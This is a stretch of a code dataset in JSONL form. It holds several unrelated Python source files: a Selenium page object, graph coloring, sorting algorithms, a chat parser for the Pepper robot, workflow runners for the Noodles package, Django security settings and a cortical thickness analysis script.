Slide Show Settings'.format(slideshow))\n driver.click(\"//input[@name='new']\")\n driver.clear(\"//input[@id='name']\")\n driver.type(\"//input[@id='name']\", slideshow)\n if pauseinterval:\n driver.select_text(\"//select[@id='pauseintervals']\",pauseinterval)\n driver.click(\"//input[@id='save']\")\n assert slideshow+ \" was created.\" in driver.get_text(\"//ul[@class='statusmsg']\")\n","sub_path":"pages/slideshow_settings_page.py","file_name":"slideshow_settings_page.py","file_ext":"py","file_size_in_byte":2648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"129247192","text":"\n\nclass ColorNode:\n\tvar = None\n\tcolor = None\n\tinterferences = None\n\n\tdef __init__(self):\n\t\tself.var = ''\n\t\tself.color = ''\n\t\tself.interferences = set()\n\nclass ColorGraph:\n\tnodes = None\n\tstack = None\n\n\tdef __init__(self):\n\t\tself.nodes = set()\n\t\tself.stack = []\n\n\tdef addNode(self, node):\n\t\tfor n in self.nodes:\n\t\t\tn.interferences.add(node)\n\t\t\tnode.interferences.add(n)\n\t\tself.nodes.add(node)\n\t\n\tdef remNode(self, node):\n\t\tfor n in self.nodes:\n\t\t\tn.interferences.remove(node)\n\t\tself.nodes.remove(node)\n","sub_path":"edu/trunk/compiler/UTexas/CS380C/lab4/3addr_to_ppc/colorgraph.py","file_name":"colorgraph.py","file_ext":"py","file_size_in_byte":500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"545507464","text":"\"\"\"Counting Sort\"\"\"\n\n\ndef counting_sort(L, m):\n \"\"\"\n The counting sort algorithm is a non-comparison based sorting\n algorithm that sorts asymptotically less than big-omega(nlogn).\n However, some pre-existing information must be provided, in the\n form of the parameter m, which indicates that the elements in L\n range from 0 to m.\n \"\"\"\n n = len(L)\n count = [0 for _ in range(m + 1)]\n positions = [0 for _ in range(m + 1)]\n output = [0 for _ in range(n)]\n\n # Construct Histogram\n for i in range(n):\n count[L[i]] += 1\n\n # Starting Positions\n for i in range(1, m + 1):\n positions[i] = positions[i - 1] + count[i - 1]\n print(positions)\n\n # Output\n for i in range(n):\n output[positions[L[i]]] = L[i]\n positions[L[i]] += 1\n\n return output\n","sub_path":"algorithms/sorting/counting_sort.py","file_name":"counting_sort.py","file_ext":"py","file_size_in_byte":817,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"572650527","text":"from __future__ import unicode_literals\n\nfrom pepper.language.ner import NER\nfrom pepper.language.pos import POS\nfrom pepper import logger\nfrom pepper import config\n\nfrom pepper.brain import LongTermMemory, Triple\nimport pepper.brain.utils.helper_functions as brain_help\n\nfrom nltk import CFG, RecursiveDescentParser\n\nfrom random import getrandbits\nfrom datetime import datetime\nimport enum\nimport json\nimport re\nimport os\nimport utils\n\n\nclass UtteranceType(enum.Enum):\n STATEMENT = 0\n QUESTION = 1\n EXPERIENCE = 2 # TODO\n\n\nclass Certainty(enum.Enum):\n CERTAIN = 0\n PROBABLE = 1\n POSSIBLE = 2\n UNDERSPECIFIED = 3\n\n\nclass Sentiment(enum.Enum):\n NEGATIVE = 0\n POSITIVE = 1\n\n\nclass Emotion(enum.Enum):\n ANGER = 0\n DISGUST = 1\n FEAR = 2\n HAPPINESS = 3\n SADNESS = 4\n SURPRISE = 5\n\n\nclass Chat(object):\n def __init__(self, speaker, context):\n \"\"\"\n Create Chat\n\n Parameters\n ----------\n speaker: str\n Name of speaker (a.k.a. the person Pepper has a chat with)\n \"\"\"\n\n self._id = getrandbits(128)\n self._context = context\n self._speaker = speaker\n self._utterances = []\n\n self._log = logger.getChild(\"{} ({})\".format(self.__class__.__name__, self.speaker))\n\n @property\n def context(self):\n \"\"\"\n Returns\n -------\n context: Context\n Context\n \"\"\"\n return self._context\n\n @property\n def speaker(self):\n \"\"\"\n Returns\n -------\n speaker: str\n Name of speaker (a.k.a. the person Pepper has a chat with)\n \"\"\"\n return self._speaker\n\n @property\n def id(self):\n \"\"\"\n Returns\n -------\n id: int\n Unique (random) identifier of this chat\n \"\"\"\n return self._id\n\n @property\n def utterances(self):\n \"\"\"\n Returns\n -------\n utterances: list of Utterance\n List of utterances that occurred in this chat\n \"\"\"\n return self._utterances\n\n @property\n def last_utterance(self):\n \"\"\"\n Returns\n -------\n last_utterance: Utterance\n Most recent Utterance\n \"\"\"\n return self._utterances[-1]\n\n def add_utterance(self, text, me):\n \"\"\"\n Add Utterance to Conversation\n\n Parameters\n ----------\n text: str\n Utterance Text to add to conversation\n\n Returns\n -------\n utterance: Utterance\n \"\"\"\n utterance = Utterance(self, text, me, len(self._utterances))\n self._log.info(utterance)\n self._utterances.append(utterance)\n return utterance\n\n def __repr__(self):\n return \"\\n\".join([str(utterance) for utterance in self._utterances])\n\n\nclass Utterance(object):\n def __init__(self, chat, transcript, me, turn):\n \"\"\"\n Construct Utterance Object\n\n Parameters\n ----------\n chat: Chat\n Reference to Chat Utterance is part of\n transcript: str\n Uttered text (Natural Language)\n me: bool\n True if Robot spoke, False if Person Spoke\n turn: int\n Utterance Turn\n \"\"\"\n\n self._chat = chat\n self._transcript = transcript\n self._me = me\n self._turn = turn\n self._datetime = datetime.now()\n\n self._tokens = self._clean(self._tokenize(transcript))\n self._parsed_tree = Parser().parse(self)\n\n @property\n def chat(self):\n \"\"\"\n Returns\n -------\n chat: Chat\n Utterance Chat\n \"\"\"\n return self._chat\n\n @property\n def type(self):\n # type: () -> UtteranceType\n raise NotImplementedError()\n\n @property\n def transcript(self):\n \"\"\"\n Returns\n -------\n transcript: str\n Utterance Transcript\n \"\"\"\n return self._transcript\n\n @property\n def me(self):\n # type: () -> bool\n \"\"\"\n Returns\n -------\n me: bool\n True if Robot spoke, False if Person Spoke\n \"\"\"\n return self._me\n\n @property\n def turn(self):\n # type: () -> int\n \"\"\"\n Returns\n -------\n turn: int\n Utterance Turn\n \"\"\"\n return self._turn\n\n @property\n def triple(self):\n # type: () -> Triple\n raise NotImplementedError()\n\n @property\n def datetime(self):\n return self._datetime\n\n @property\n def language(self):\n \"\"\"\n Returns\n -------\n language: str\n Original language of the Transcript\n \"\"\"\n raise NotImplementedError()\n\n @property\n def certainty(self):\n # type: () -> Certainty\n raise NotImplementedError()\n\n @property\n def sentiment(self):\n # type: () -> Sentiment\n raise NotImplementedError()\n\n @property\n def emotion(self):\n # type: () -> Emotion\n raise NotImplementedError()\n\n @property\n def tokens(self):\n \"\"\"\n Returns\n -------\n tokens: list of str\n Tokenized transcript\n \"\"\"\n return self._tokens\n\n @property\n def parsed_tree(self):\n \"\"\"\n Returns\n -------\n parsed_tree: ntlk Tree generated by the CFG parser\n \"\"\"\n return self._parsed_tree\n\n def _tokenize(self, transcript):\n \"\"\"\n Parameters\n ----------\n transcript: str\n Uttered text (Natural Language)\n\n Returns\n -------\n tokens: list of str\n Tokenized transcript: list of cleaned tokens\n - remove contractions\n \"\"\"\n\n tokens_raw = transcript.split()\n tokens = []\n for word in tokens_raw:\n clean_word = re.sub('[?!]', '', word)\n tokens.append(clean_word)\n return tokens\n\n def _clean(self, tokens):\n \"\"\"\n Parameters\n ----------\n tokens: list of str\n Tokenized transcript\n\n Returns\n -------\n cleaned_tokens: list of str\n Tokenized & Cleaned transcript\n \"\"\"\n\n # TODO: Remove Contractions\n\n return tokens\n\n def __repr__(self):\n author = config.NAME if self.me else self.chat.speaker\n return \"Utterance {:03d}: {:10s} -> {}\".format(self.turn, author, self.transcript)\n\n\nclass Parser(object):\n\n POS_TAGGER = None # Type: POS\n CFG_GRAMMAR_FILE = os.path.join(os.path.dirname(__file__), 'cfg.txt')\n\n def __init__(self):\n if not Parser.POS_TAGGER:\n Parser.POS_TAGGER = POS()\n\n with open(Parser.CFG_GRAMMAR_FILE) as cfg_file:\n self._cfg = cfg_file.read()\n\n def parse(self, utterance):\n tokenized_sentence = utterance.tokens\n pos = self.POS_TAGGER.tag(tokenized_sentence)\n #print(pos)\n\n '''\n doc = nlp(utterance.transcript)\n for token in doc:\n #print(token.text, token.lemma_, token.pos_)\n ind = 0\n for w in pos:\n if w[0]==token.text and w[1]!=token.pos_:\n print('mismatch ',w[1],token.pos_)\n if w[1]=='IN' and token.pos_=='VERB':\n pos[ind]=(token.text,'VBP')\n ind+=1\n '''\n\n ind = 0\n for w in tokenized_sentence:\n if w=='like':\n pos[ind] = (w, 'VBP')\n ind+=1\n\n\n for el in pos:\n if el[1].endswith('$'):\n new_rule = el[1][:-1] + 'POS -> \\'' + el[0] + '\\'\\n'\n else:\n new_rule = el[1] + ' -> \\'' + el[0] + '\\'\\n'\n if new_rule not in self._cfg:\n self._cfg += new_rule\n\n cfg_parser = CFG.fromstring(self._cfg)\n RD = RecursiveDescentParser(cfg_parser)\n parsed = RD.parse(tokenized_sentence)\n return [tree for tree in parsed]\n\n\nclass Analyzer(object):\n\n # Load Grammar Json\n GRAMMAR_JSON = os.path.join(os.path.dirname(__file__), 'grammar.json')\n with open(GRAMMAR_JSON) as json_file:\n GRAMMAR = json.load(json_file)['grammar']\n\n # Load Stanford Named Entity Recognition Server\n NER = None # type: NER\n\n def __init__(self, chat):\n \"\"\"\n Abstract Analyzer Object: call Analyzer.analyze(utterance) factory function\n\n Parameters\n ----------\n chat: Chat\n Chat to be analyzed\n \"\"\"\n\n if not Analyzer.NER:\n Analyzer.NER = NER('english.muc.7class.distsim.crf.ser')\n\n self._chat = chat\n self._log = logger.getChild(self.__class__.__name__)\n\n @staticmethod\n def analyze(chat):\n \"\"\"\n Analyzer factory function\n\n Find appropriate Analyzer for this utterance\n\n Parameters\n ----------\n chat: Chat\n Chat to be analyzed\n\n Returns\n -------\n analyzer: Analyzer\n Appropriate Analyzer Subclass\n \"\"\"\n\n forest = chat.last_utterance.parsed_tree\n\n if not forest:\n print(\"unparsed input\")\n #raise Exception(\"Ungrammatical Input\") #TODO\n\n for tree in forest:\n sentence_type = tree[0].label()\n\n if sentence_type == 'S':\n return StatementAnalyzer.analyze(chat)\n elif sentence_type == 'Q':\n return QuestionAnalyzer.analyze(chat)\n else:\n print(\"Error: \", sentence_type)\n\n '''\n if chat.last_utterance.tokens:\n first_token = chat.last_utterance.tokens[0]\n\n question_words = Analyzer.GRAMMAR['question words'].keys()\n to_be = Analyzer.GRAMMAR['to be'].keys()\n modal_verbs = Analyzer.GRAMMAR['modal_verbs']\n\n question_cues = question_words + to_be + modal_verbs\n\n # Classify Utterance as Question / Statement\n if first_token in question_cues:\n return QuestionAnalyzer.analyze(chat)\n else:\n return StatementAnalyzer.analyze(chat)\n else:\n raise ValueError(\"Utterance should have at least one element\")\n '''\n\n @property\n def log(self):\n \"\"\"\n Returns\n -------\n log: logging.Logger\n \"\"\"\n return self._log\n\n @property\n def chat(self):\n \"\"\"\n Returns\n -------\n chat: Chat\n Chat to be analyzed\n \"\"\"\n return self._chat\n\n @property\n def utterance_type(self):\n \"\"\"\n Returns\n -------\n utterance_type: UtteranceType\n Utterance Type\n \"\"\"\n return NotImplementedError()\n\n @property\n def rdf(self):\n \"\"\"\n Returns\n -------\n rdf: dict or None\n \"\"\"\n raise NotImplementedError()\n\n @property\n def template(self):\n \"\"\"\n Returns\n -------\n template: dict or None\n \"\"\"\n\n # TODO: Implement here!\n\n return None\n\n\nclass StatementAnalyzer(Analyzer):\n \"\"\"Abstract StatementAnalyzer Object: call StatementAnalyzer.analyze(utterance) factory function\"\"\"\n\n @staticmethod\n def analyze(chat):\n \"\"\"\n StatementAnalyzer factory function\n\n Find appropriate StatementAnalyzer for this utterance\n\n Parameters\n ----------\n chat: Chat\n Chat to be analyzed\n\n Returns\n -------\n analyzer: StatementAnalyzer\n Appropriate StatementAnalyzer Subclass\n \"\"\"\n\n\n return GeneralStatementAnalyzer(chat)\n\n @property\n def utterance_type(self):\n \"\"\"\n Returns\n -------\n utterance_type: UtteranceType\n Utterance Type (Statement)\n \"\"\"\n return UtteranceType.STATEMENT\n\n @property\n def rdf(self):\n \"\"\"\n Returns\n -------\n rdf: dict or None\n \"\"\"\n raise NotImplementedError()\n\n\nclass GeneralStatementAnalyzer(StatementAnalyzer):\n def __init__(self, chat):\n \"\"\"\n General Statement Analyzer\n\n Parameters\n ----------\n chat: Chat\n Chat to be analyzed\n \"\"\"\n\n super(GeneralStatementAnalyzer, self).__init__(chat)\n\n rdf = {'predicate': '', 'subject': '', 'object': ''}\n position = 0\n dict = {}\n\n for tree in chat.last_utterance.parsed_tree[0]:\n for branch in tree:\n for node in branch:\n\n if len(node.leaves())>1:\n for n in node.leaves():\n print ('n ', n)\n\n position += 1\n\n #print(node.label(), node.leaves()[0])\n if node.label().startswith('V') and \\\n (node.leaves()[0].lower() in self.GRAMMAR['verbs'] or node.leaves()[0].lower()[:-1] in\n self.GRAMMAR['verbs'] or node.leaves()[0].lower() in self.GRAMMAR['to be']):\n rdf['predicate'] += node.leaves()[0] + ' '\n\n elif node.leaves()[0]=='from':\n if rdf['predicate'].strip() in self.GRAMMAR['to be']:\n rdf['predicate'] = 'is_from'\n\n elif node.leaves()[0].lower() in self.GRAMMAR['pronouns'] and position < len(\n chat.last_utterance.tokens):\n rdf['subject'] += node.leaves()[0] + ' '\n dict['pronoun'] = self.GRAMMAR['pronouns'][node.leaves()[0].lower()]\n rdf['subject'] = utils.fix_pronouns(dict, self.chat.speaker)\n\n elif node.label().startswith('N') and position == len(chat.last_utterance.tokens):\n rdf['object'] += node.leaves()[0] + ' '\n\n\n\n\n for el in rdf:\n rdf[el] = rdf[el].strip()\n\n if rdf['object'].lower() in self.GRAMMAR['pronouns']:\n dict['pronoun'] = self.GRAMMAR['pronouns'][node.leaves()[0].lower()]\n rdf['object'] = utils.fix_pronouns(dict, self.chat.speaker)\n\n print(rdf)\n self._rdf = rdf\n\n\n @property\n def rdf(self):\n \"\"\"\n Returns\n -------\n rdf: dict or None\n \"\"\"\n return self._rdf\n\n\nclass ObjectStatementAnalyzer(StatementAnalyzer):\n def __init__(self, chat):\n \"\"\"\n Object Statement Analyzer\n\n Parameters\n ----------\n chat: Chat\n \"\"\"\n\n super(ObjectStatementAnalyzer, self).__init__(chat)\n\n # TODO: Implement Chat -> RDF\n\n self._rdf = {}\n\n @property\n def rdf(self):\n \"\"\"\n Returns\n -------\n rdf: dict or None\n \"\"\"\n return self._rdf\n\n\nclass QuestionAnalyzer(Analyzer):\n \"\"\"Abstract QuestionAnalyzer Object: call QuestionAnalyzer.analyze(utterance) factory function\"\"\"\n\n @staticmethod\n def analyze(chat):\n \"\"\"\n QuestionAnalyzer factory function\n\n Find appropriate QuestionAnalyzer for this utterance\n\n Parameters\n ----------\n chat: Chat\n Chat to be analyzed\n\n Returns\n -------\n analyzer: QuestionAnalyzer\n Appropriate QuestionAnalyzer Subclass\n \"\"\"\n if chat.last_utterance.tokens:\n first_word = chat.last_utterance.tokens[0]\n if first_word.lower() in Analyzer.GRAMMAR['question words']:\n return WhQuestionAnalyzer(chat)\n else:\n return VerbQuestionAnalyzer(chat)\n\n @property\n def utterance_type(self):\n \"\"\"\n Returns\n -------\n utterance_type: UtteranceType\n Utterance Type (Question)\n \"\"\"\n return UtteranceType.QUESTION\n\n @property\n def rdf(self):\n \"\"\"\n Returns\n -------\n rdf: dict or None\n \"\"\"\n raise NotImplementedError()\n\n\nclass WhQuestionAnalyzer(QuestionAnalyzer):\n def __init__(self, chat):\n \"\"\"\n Wh-Question Analyzer\n\n Parameters\n ----------\n chat: Chat\n \"\"\"\n\n super(WhQuestionAnalyzer, self).__init__(chat)\n\n rdf = {'predicate': '', 'subject': '', 'object': ''}\n position = 0\n dict = {}\n\n for tree in chat.last_utterance.parsed_tree[0]:\n for branch in tree:\n for node in branch:\n for leaf in node.leaves():\n\n position += 1\n #print(node.label(), leaf)\n\n if node.label().startswith('V') and \\\n (leaf.lower() in self.GRAMMAR['verbs'] or leaf.lower()[:-1]in self.GRAMMAR['verbs']):\n rdf['predicate'] += leaf + ' '\n\n elif leaf.lower() in self.GRAMMAR['pronouns'] and position < len(chat.last_utterance.tokens):\n rdf['subject'] += leaf + ' '\n dict['pronoun'] = self.GRAMMAR['pronouns'][leaf.lower()]\n\n elif node.label().startswith('N') and position == len(chat.last_utterance.tokens):\n rdf['object'] += leaf + ' '\n\n elif leaf.lower()=='from':\n rdf['predicate']='is_from'\n\n for el in rdf:\n rdf[el] = rdf[el].strip()\n\n if 'pronoun' in dict:\n rdf['subject'] = utils.fix_pronouns(dict, self.chat.speaker)\n\n print(rdf)\n\n self._rdf = rdf\n\n @property\n def rdf(self):\n \"\"\"\n Returns\n -------\n rdf: dict or None\n \"\"\"\n return self._rdf\n\n\nclass VerbQuestionAnalyzer(QuestionAnalyzer):\n def __init__(self, chat):\n \"\"\"\n Verb Question Analyzer\n\n Parameters\n ----------\n chat: Chat\n \"\"\"\n\n super(VerbQuestionAnalyzer, self).__init__(chat)\n\n rdf = {'predicate': '', 'subject':'', 'object':''}\n position = 0\n dict = {}\n\n for tree in chat.last_utterance.parsed_tree[0]:\n for branch in tree:\n for node in branch:\n position += 1\n #print(node.label(), node.leaves()[0])\n if node.label().startswith('V') and node.leaves()[0].lower() in self.GRAMMAR['verbs']:\n rdf['predicate']+=node.leaves()[0]+' '\n\n elif node.leaves()[0].lower() in self.GRAMMAR['pronouns'] and position> pass_job\n\n return S.run(W, get_workflow(wf))\n\n\ndef start_job(db):\n \"\"\"Adds a time stamp to the database.\"\"\"\n @pull\n def start_job_f(source):\n for key, job in source():\n db.add_time_stamp(key, 'start')\n yield key, job\n\n return start_job_f\n\n\n@sink_map\ndef print_result(key, status, result, msg):\n print(status, result)\n\n\ndef schedule_job(results, registry, db,\n job_keeper=None, pred=lambda job: True):\n \"\"\"Schedule a job, providing there is no result for it in the database yet.\n\n First the database checks if there is a previous job that is identical to\n the current one. If this is the case, the result is 'retrieved'.\n\n If there is no result, but the job description is in the database, either\n the job is still running, or it was tried before but Noodles crashed.\n\n In the first case, the job is 'attached' to the already running job.\n In the second case, the record of the previous job is deleted and the new\n job is scheduled.\n \"\"\"\n @push\n def schedule_f(job_sink_):\n job_sink = job_sink_()\n result_sink = results.sink()\n\n while True:\n key, job = yield\n\n if pred(job):\n job_msg = registry.deep_encode(job)\n prov = prov_key(job_msg)\n\n if db.job_exists(prov):\n status, other_key, result = db.get_result_or_attach(\n key, prov, job_keeper)\n if status == 'retrieved':\n result_sink.send(\n (key, 'retrieved',\n registry.deep_decode(result, deref=True), None))\n continue\n elif status == 'attached':\n continue\n elif status == 'broken':\n db.new_job(key, prov, job_msg)\n job_sink.send((key, job))\n\n else:\n db.new_job(key, prov, job_msg)\n job_sink.send((key, job))\n\n else:\n job_sink.send((key, job))\n\n return schedule_f\n\n\ndef store_result_deep(registry, db, job_keeper=None, pred=lambda job: True):\n \"\"\"When the result is known, we can insert it in the database. This is\n only done if the result is not a workflow. If the result is a workflow,\n a 'link' is added in the database, identifying the workflow by the Python\n `id` of the workflow object. When this workflow is finished the final\n result is inserted in the database.\"\"\"\n def store_result(key, result, msg):\n result_msg = registry.deep_encode(result)\n attached = db.store_result(key, result_msg)\n if attached:\n for akey in attached:\n yield ResultMessage(akey, 'attached', result, msg)\n\n @pull\n def f(source):\n for key, status, result, msg in source():\n wf, n = job_keeper[key]\n job = wf.nodes[n]\n\n if pred(job):\n if is_workflow(result):\n db.add_link(key, id(get_workflow(result)))\n else:\n yield from store_result(key, result, msg)\n\n if wf.root == n:\n linked_jobs = db.get_linked_jobs(id(wf))\n\n if is_workflow(result):\n for k in linked_jobs:\n db.add_link(k, id(get_workflow(result)))\n\n else:\n for k in linked_jobs:\n yield from store_result(k, result, msg)\n\n yield ResultMessage(key, status, result, msg)\n\n return f\n\n\ndef run_parallel(wf, n_threads, registry, jobdb_file, job_keeper=None):\n \"\"\"Run a workflow in `n_threads` parallel threads. Now we replaced the\n single worker with a thread-pool of workers.\n\n This version works with the JobDB to cache results.\"\"\"\n registry = registry()\n db = JobDB(jobdb_file)\n\n if job_keeper is None:\n job_keeper = JobKeeper()\n S = Scheduler(job_keeper=job_keeper)\n\n jobs = Queue()\n results = Queue()\n\n assert job_keeper is not None\n\n LogQ = Queue()\n threading.Thread(\n target=patch,\n args=(LogQ.source, job_keeper.message),\n daemon=True).start()\n\n @push_map\n def log_job_start(key, job):\n return (key, 'start', job, None)\n\n r_src = jobs.source \\\n >> start_job(db) \\\n >> branch(log_job_start >> LogQ.sink) \\\n >> thread_pool(*repeat(worker, n_threads), results=results) \\\n >> store_result_deep(registry, db, job_keeper) \\\n >> branch(LogQ.sink)\n\n j_snk = schedule_job(results, registry, db, job_keeper) >> jobs.sink\n\n return S.run(Connection(r_src, j_snk), get_workflow(wf))\n\n\ndef create_prov_worker(\n worker, results, registry, jobdb_file, job_keeper,\n pred=lambda x: True, log_q=None):\n registry = registry()\n db = JobDB(jobdb_file)\n\n jobs = Queue()\n\n r_src = jobs.source \\\n >> start_job(db) \\\n >> worker \\\n >> store_result_deep(registry, db, job_keeper, pred)\n\n @push_map\n def log_job_sched(key, job):\n return (key, 'schedule', job, None)\n\n j_snk = broadcast(\n log_job_sched >> log_q.sink,\n schedule_job(results, registry, db, job_keeper, pred) >> jobs.sink)\n\n return Connection(r_src, j_snk)\n\n\ndef prov_wrap_connection(\n worker, results, registry, jobdb_file, job_keeper,\n pred=lambda x: True, log_q=None):\n registry = registry()\n db = JobDB(jobdb_file)\n\n r_src = worker.source \\\n >> store_result_deep(registry, db, job_keeper, pred)\n\n @push_map\n def log_job_sched(key, job):\n return (key, 'schedule', job, None)\n\n j_snk = broadcast(\n log_job_sched >> log_q.sink,\n schedule_job(results, registry, db, job_keeper, pred) >> worker.sink)\n\n return Connection(r_src, j_snk)\n\n\ndef run_parallel_opt(wf, n_threads, registry, jobdb_file,\n job_keeper=None, display=None, cache_all=False):\n \"\"\"Run a workflow in `n_threads` parallel threads. Now we replaced the\n single worker with a thread-pool of workers.\n\n This version works with the JobDB to cache results; however we only store\n the jobs that are hinted with the 'store' keyword.\n\n :param wf:\n The workflow.\n\n :param n_threads:\n The number of threads to start.\n\n :param registry:\n The serialisation to use in order to store results in the database,\n as well as identify jobs.\n\n :param jobdb_file:\n The filename of the job database.\n\n :param job_keeper:\n The JobKeeper instance to keep runtime information in. If not given,\n we create one for you and throw it in the trash when we're done.\n\n :param display:\n The display routine to display activity. If not given, we won't report\n on any activity.\n \"\"\"\n if job_keeper is None:\n job_keeper = JobKeeper()\n S = Scheduler(job_keeper=job_keeper)\n\n results = Queue()\n\n if cache_all:\n def pred(job):\n return True\n else:\n def pred(job):\n return job.hints and 'store' in job.hints\n\n LogQ = Queue()\n if display:\n tgt = broadcast(job_keeper.message, sink_map(display))\n else:\n tgt = job_keeper.message\n\n threading.Thread(\n target=patch,\n args=(LogQ.source, tgt),\n daemon=True).start()\n\n parallel_worker = \\\n thread_pool(*repeat(worker, n_threads), results=results) >> \\\n branch(LogQ.sink)\n\n return S.run(\n create_prov_worker(\n parallel_worker, results, registry, jobdb_file, job_keeper,\n pred, LogQ),\n get_workflow(wf))\n","sub_path":"noodles/run/run_with_sqlite.py","file_name":"run_with_sqlite.py","file_ext":"py","file_size_in_byte":9405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"141170256","text":"import time\nfrom Swap import _swap\n\n\ndef find_pivot(data_list, start, end):\n \"\"\"\n Finds the pivot value with in the sub list using the median of three method\n Expected Complexity: O(1) (time and space)\n\n :param data_list: Python list to find the pivot value in\n :param start: Integer for the starting index within the list\n :param end: Integer for the ending index within the list\n\n :return: Integer for the pivot value found using the median of three method\n \"\"\"\n\n # pull the first, middle, and last values in the sublist\n first = data_list[start]\n middle = data_list[(start + end) // 2]\n last = data_list[end]\n\n # this was done so that it could be done in constant time\n if (middle <= first <= last) or (last <= first <= middle):\n return first\n\n elif (first <= middle <= last) or (last <= middle <= first):\n return middle\n\n elif (first <= last <= middle) or (middle <= last <= first):\n return last\n\n\ndef partition(data_list, start, end, draw_data, time_value):\n \"\"\"\n Partitions the sub list and visualizes the steps\n Expected Complexity: O(n) (time) and O(1) (space)\n\n :param data_list: Python list to be partitioned\n :param start: Integer for the starting index in the list\n :param end: Integer for the ending index in the list\n :param draw_data: Function written in main.py that visualizes the list\n :param time_value: Float based on the input for time between steps\n\n :return: Integer for the index of the pivot value after the partition\n \"\"\"\n pivot_value = find_pivot(data_list, start, end)\n\n i = start - 1\n\n for j in range(start, end + 1):\n\n # moves each value that is less than the pivot to the left\n if data_list[j] < pivot_value:\n i += 1\n _swap(data_list, i, j)\n\n # generate the color list to be visualized\n color_list = [\"red\" for x in range(len(data_list))]\n\n # color the values being swapped green\n for x in range(len(color_list)):\n if (x == i) or (x == j):\n color_list[x] = \"green\"\n\n # visualizes the list and wait for the specified amount of time\n draw_data(data_list, color_list)\n time.sleep(time_value)\n\n i += 1\n\n # does one last swap to move the pivot value in the right spot\n swap_index = data_list.index(pivot_value)\n _swap(data_list, i, swap_index)\n\n # generate the color list to be visualized\n color_list = [\"red\" for x in range(len(data_list))]\n\n # color the values being swapped green\n for x in range(len(color_list)):\n if (x == i) or (x == swap_index):\n color_list[x] = \"green\"\n\n # visualizes the list and wait for the specified amount of time\n draw_data(data_list, color_list)\n time.sleep(time_value)\n\n return i\n\n\ndef quick_sort(data_list, start, end, draw_data, time_value):\n \"\"\"\n Does a quick sort on the list and visualizes the steps\n Expected Complexity (Sort only): O(n*log(n)) (time) and O(1) (space)\n\n :param data_list: Python list to be sorted\n :param start: Integer of the starting index in the list\n :param end: Integer of the ending index in the list\n :param draw_data: Function written in main.py to visualize the list\n :param time_value: Float based on the input for the time between steps\n \"\"\"\n # stop when the start and end index are equal (or when start > end)\n if start >= end:\n return\n\n pivot_index = partition(data_list, start, end, draw_data, time_value)\n\n # sorting the first half of the data\n quick_sort(data_list, start, pivot_index, draw_data, time_value)\n\n # sorting the second half of the data\n quick_sort(data_list, pivot_index + 1, end, draw_data, time_value)\n\n # color the whole list green after the sort\n draw_data(data_list, [\"green\" for i in range(len(data_list))])\n","sub_path":"gui_based_sorts/QuickSort.py","file_name":"QuickSort.py","file_ext":"py","file_size_in_byte":3894,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"164363724","text":"\"\"\"\nCopyright 2017 Peter Urda\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\"\"\"\n\nimport os\n\n# noinspection PyUnresolvedReferences\nfrom .base import * # noqa\n\nALLOWED_HOSTS = [\n 'mrbutler.urda.cc'\n]\n\nINSTALLED_APPS = [\n 'raven.contrib.django.raven_compat',\n] + INSTALLED_APPS # noqa\n\nCSRF_COOKIE_HTTPONLY = True\nCSRF_COOKIE_SECURE = True\nSECURE_BROWSER_XSS_FILTER = True\nSECURE_CONTENT_TYPE_NOSNIFF = True\nSECURE_HSTS_INCLUDE_SUBDOMAINS = True\nSECURE_HSTS_SECONDS = 86400\nSECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTO', 'https')\nSECURE_SSL_REDIRECT = True\nSESSION_COOKIE_SECURE = True\nX_FRAME_OPTIONS = 'DENY'\n\nRAVEN_CONFIG = {\n 'dsn': os.environ['SENTRY_DSN'],\n 'release': os.environ['SOURCE_VERSION'],\n}\n","sub_path":"web/core/settings/prod.py","file_name":"prod.py","file_ext":"py","file_size_in_byte":1203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"280448023","text":"from pathlib import *\nimport pandas as pd\nimport numpy as np\nimport os, six\nimport mne\nimport nibabel as nib\nimport math\nimport statsmodels as sm\nimport csv\nfrom scipy import stats as ss\nfrom mmimproc.utils import run_subprocess, WorkingContext\nfrom mmimproc.utils.paths import getnetworkdataroot\nfs = mmimproc.fs_local\nproject = 'bbc'\n# first set up the 3 cortical thickness dataframes as input\ncontrl_sid = ['sub-bbc209', 'sub-bbc211', 'sub-bbc208', 'sub-bbc202', 'sub-bbc249', 'sub-bbc241', 'sub-bbc243', 'sub-bbc231', 'sub-bbc253']\nfoster_sid = ['sub-bbc101', 'sub-bbc105', 'sub-bbc106', 'sub-bbc108', 'sub-bbc113', 'sub-bbc116', 'sub-bbc118', 'sub-bbc119', 'sub-bbc120']\nlh_ct = pd.DataFrame.from_csv(str(fs/project/'grp_parc_stats_lh_cortical_thickness.csv'), index_col=None)\nrh_ct = pd.DataFrame.from_csv(str(fs/project/'grp_parc_stats_rh_cortical_thickness.csv'), index_col=None)\n\n\nlh_ct['Subjid'] = lh_ct['lh.aparc.a2009s.thickness'].str.partition('/').drop([2,1], axis=1)\nlh_ct = lh_ct.set_index(['Subjid'])\nlh_ct = lh_ct.drop('lh.aparc.a2009s.thickness', axis=1)\nlh_ct = lh_ct.transpose().astype('float')\nrh_ct['Subjid'] = rh_ct['rh.aparc.a2009s.thickness'].str.partition('/').drop([2,1], axis=1)\nrh_ct = rh_ct.set_index(['Subjid'])\nrh_ct = rh_ct.drop('rh.aparc.a2009s.thickness', axis=1)\nrh_ct = rh_ct.transpose().astype('float')\n\n\nlh_ct_ctrl = lh_ct[contrl_sid]\nlh_ct_fost = lh_ct[foster_sid]\nlh_ct['209-101'] = lh_ct['sub-bbc209'] - lh_ct['sub-bbc101']\nlh_ct['211-105'] = lh_ct['sub-bbc211'] - 